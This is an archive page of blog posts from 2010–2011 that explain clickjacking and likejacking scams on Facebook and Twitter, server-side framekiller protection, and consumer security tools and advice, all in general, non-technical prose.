Posted tagged ‘social networking’

Server-side Clickjack Protection

September 11, 2011

If you’ve been worrying about clickjacking attacks on the websites you visit often, you might be surprised to learn that site’s have the ability to impede these attacks. The fact of the matter is some websites just don’t focus that much on security strategies that would really keep their visitors safe. That isn’t to say that website administrators and developers could prevent all clickjacking attacks, but they could certainly make it harder for hackers to ruin your day.

Quite frankly, social networking sites (especially Facebook) are some of the worst offenders. To some extent, that’s understandable. Consider, for instance, how many people visit Facebook every day. That makes the site a target for clickjackers that want to reach a large audience quickly. Plus, Facebook wants to make it easy for people to share information  with each other. Any kind of block could negatively affect service.

When it comes down to it, though, more websites could use server-side clickjacking protection. It’s actually pretty easy.

The most common technique is called a framekiller. It’s a piece of JavaScript that prevents a site from loading frames from different sources. Unfortunately, it’s not always reliable. It’s especially easy for fairly advanced hacking techniques to trick Internet Explorer into loading the clickjacked link as asked.

Should websites have more responsibility when it comes to protecting visitors. That depends. A site like Facebook should definitely lead the security development to stop clickjacking. They’re big enough and have enough resources to take on the  problem. Plus, it’s in their best interest to offer more safety to their members. Since Facebook doesn’t have a true competitor, though, the company might not feel too motivated in this area.

Free Southwest Plane Tickets

February 25, 2011

Fraudsters have promised free airline tickets before by creating fake advertisements for companies like JetBlue and Delta. Most of these have been standard clickjacking scams that spread via a person’s facebook wall. The trick is fairly simple for hackers with minimal amounts of training. They create a fake ad for free airplane tickets. Suspended above the ad, however, is an invisible link that instructs facebook to post a message to that person’s wall. This is the fastest way for hackers to spread their message to millions of people.

The latest clickjacking scheme, this one for Southwest Airlines, however, takes a slightly different approach that has tricked savvy facebook users who thought they knew how to avoid fraudulent ads.

Instead of making clickjacked ads that post a message to a person’s wall, this clickjacking scheme posts messages in other locations. By posting the message as, for instance, a picture comment, hackers find that more facebook users are tricked into following the link.

Why? Well, any new scheme is certain to trick a few people just because it hasn’t been encountered before. There’s also a psychological factor involved.

When a clickjacked link is posted under a picture, most people think that it is a comment directly from someone they know. That was once the case when it came to wall posts too, but now facebook users are wary of posts that seem out of character. This tactic takes clickjacking to a new level of personal communication.

Of course, there is a big problem: clickjacked links posted as picture comments often seem out of context. That’s a good way to spot them. We’ve always been taught to question deals that seem too good to be true. Now it’s time to consider whether the offers sound too weird to be true.

Top Five Internet Security Misconceptions

November 19, 2010

Just a couple days ago, Kindsight, a company that focuses on issues such as identity theft, published a blog post explaining the top five internet security misconceptions that they have found amongst casual internet users. One of those misconceptions is that “Facebook is safe enough; no need to worry.”

Apparently, those people don’t read this blog, or the countless others discussing security issues spread through social networking sites.

To a large extent, Facebook itself is fairly safe. But it is used to push people towards compromised content. This is most often accomplished with clickjacking attacks. When hackers make clickjacking attacks, they often publicize the sites by posting the URLs on Facebook, Myspace, and other popular social networking sites. They usually include a statement that will entice the average user into following the link. Popular topics focus on busty girls and Justin Beiber, although I’m pretty sure that there is connection there.

When users follow the tempting link, they are taken to a page that has invisible elements. Click on the page, and you’ve just launched a potentially malicious piece of software that can infect your computer.

Facebook’s safety was listed as the number five misconception. The others include,

  1. Internet users are safe from identity theft as long as they don’t shop online
  2. Anti-virus protection means internet users are safe
  3. Using secure websites means that you will never encounter security problems
  4. Hacked websites are easy to identify and avoid

Unfortunately, none of these statements are true. You can read the entire article, and view video clips, at the Kindsight Blog.

Making Facebook more secure and fun

October 26, 2010

Facebook isn’t a whole lot of fun when you’re constantly worried about likejacked links that could endanger your computer’s security. Until recently, though, there hasn’t been a whole lot that Facebook members could do to avoid clickjacked links on Facebook. The best strategies were to pay attention and pray.

As Facebook and other social networking sites have become more dangerous to casual computer users, security organizations have looked for ways to stop clickjackers from stealing the fun from the internet. BitDefender, though, recently released software that can make Facebook safer and more fun.

The app is called SafeGo. It has been specifically designed to protect Facebook users from clickjacking attacks. When you use SafeGo, it alerts you to potential security alerts and highlights compromised links. It even manages to make computer security lighthearted and fun. When you install the SafeGo app, it asks you to take a brief quiz designed to estimate your security risk. Most of the questions, however, are outlandish.If you are a fan of the surreal, then you’ll enjoy taking the quiz.

After completing the quiz, SafeGo will show you compromised links from your friends. This gives you the opportunity to alert your friends about the security risks.

In order to take advantage of BitDefender’s new application, you are going to have to trust the company a bit. The SafeGo app needs access to your computer that you typically wouldn’t give most programs. So far, there aren’t any reports of the company misusing the security pass, but there is always the chance that they, or someone with access to their information, could use SafeGo to bypass your security efforts for nefarious purposes. Chances are that you will be safe. Still, you should always know that there is a risk potential.

Clickjacking represents serious problem for some employers

October 4, 2010

Most employers worry about virus, trojans, and other types of malware that infiltrate their systems via emails. A recent survey, however, shows that employers might want to have their IT managers shift the focus from email to internet security risks. According to Panda Security, cybercriminals have been devoting more of their resources to clickjacking techniques rather than email scams.

Clickjacking uses an invisible frame that sits on top of an image or link. When you look at a web page that has been clickjacked, you will only see common images, buttons, and links. By and large, they look just like other websites. Actually, that’s the point because the criminals want to convince you that it’s perfectly safe to click on the pages. Unfortunately, when users click on certain elements, they click on invisible links that hover above the elements that they can actually see. Clicking on the invisible links can unleash troublesome malware.

Currently, social networking sites are the easiest ways for criminals to spread clickjacking attacks. In fact, clickjacks on Facebook have become so common that they are now referred to as likejacks. The criminals who use Facebook frequently use the site’s like button to lure in victims.

Why is this such a problem for employers?

The Panda Security survey shows that 77 percent of employees polled admitted to using company computers to access social networking sites. Perhaps even more disturbing is that 33 percent of the companies included in the survey were infected by malware distributed through clickjacks.

The easiest solution is for employers to block Facebook, Myspace, and similar sites. Businesses that rely on these sites to communicate with their customers, however, might not have this option. Instead, they should focus on educating employees about the dangers of clickjacking and ways that they can protect their computers while logged on to social networking sites. In addition, using reliable antivirus software and scanning your computers for harmful files regularly can improve performance and stop malware from causing problems.

How Much Do We Know about Click-Jacking?

June 14, 2010

Everyone from my six-year-old to my grandmother knows about the threats of computer viruses. It’s a no-brainer these days. If you know how to double-click an IE icon, then you know to scan email attachments for viruses and stay away from sites that offer illegal downloads.

Viruses still get around, but we’re all much better educated about them than we were a decade ago.

When it comes to clickjacking, though, few of us understand the threat well enough to avoid it. Searching Google for “clickjacking threat” brings up as many articles from today as 2008. That suggests to me that a significant number of internet users don’t know what’s going on.

This is a dangerous situation because click-jacking attacks have gotten more sophisticated. The latest attacks use social networking sites to trick people into unknowingly installing applications on their computers. These apps aren’t always dangerous. In fact, the most pervasive ones have been more annoying than anything else. Still, the lack of education combined with the potential creates a very dangerous situation.

If people don’t start talking about clickjacking as much as they talk about viruses and worms, then hackers are eventually going to unleash a giant attack that ruins a lot of lives.

This isn’t an exaggeration. At least not a big one. Clickjacking has the potential to install viruses  and worms without ever letting the user know that such actions are taking place. This is a tool for hackers that could completely change the internet security game.

Getting informed about click-jacking attacks, however, can help you avoid them. It’s not as hard as you might think. Using your head and staying skeptical are two of the best defenses. Using up-to-date web browsers, antivirus software, and plug-ins like NoScript can also help considerably.

Until we teach more people about click-jacking, though, the threat remains high for us all.

Clickjacking Attack on Twitter

March 16, 2010

Last year Twitter responded to its first clickjacking attack. No one has seen any negative repercussions from the attack, but users could have potentially compromised their security by falling for the prank.

The scheme involved the phrase “don’t click” followed by a link. Of course, many of those who received the message clicked on the link out of curiosity. This led to another screen that said “don’t click.” When this link was clicked, nothing seemed to happen, but the message contained javascript that replicated itself and sent it out to everyone following the person’s tweets.

Many people passed it on without knowing that they had ever been duped by some sneaky programming.

Like many clickjacking schemes that use social networking tools, the message spread like wildfire.

Within just six hours the message had spread to 260 users and continued to grow exponentially. Twitter caught on quickly, though, and shut down the clickjacking scheme. According to the company’s representatives, it did not take them very long to identify the problem and solve it.

Even though the “don’t click” clickjacking attack didn’t spread any malware or steal information, it shows that Twitter users should be more careful. Their actions could have more serious consequences.

It’s good to see that Twitter responded so quickly to the threat. This indicates to me that they have a crack team of security specialists who understand the potential threats that could harm their members.

I suppose that the ultimate lesson here, though, is that while you can’t believe everything that you see on Twitter, you can be fairly certain to not do things when instructed not to do them.

You can read more about “don’t click” at Sunlight Labs, CNET, and Daniel Sandler’s blog.